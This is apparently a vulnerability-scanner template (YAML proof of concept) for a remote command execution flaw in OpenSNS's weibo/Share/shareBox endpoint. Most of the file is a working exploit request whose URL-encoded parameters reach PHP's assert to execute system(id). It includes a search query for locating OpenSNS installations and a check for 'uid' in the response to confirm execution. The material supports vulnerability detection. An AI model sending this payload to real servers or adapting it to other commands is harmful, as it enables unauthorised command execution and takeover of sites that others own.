name: OpenSNS Application ShareController.class.php  remote command execution vulnerability
manual: true
query: app="OpenSNS"
transport: http
rules:
  r0:
    request:
      method: GET
      path: /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)
      headers:
        User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(b"uid")
expression: r0()
detail:
  author: gobysec@gmail.com
  links:
  - https://gobies.org/
  description: OpenSNS 存在远程命令执行漏洞，攻击者通过漏洞发送特定的请求包可以执行任意命令
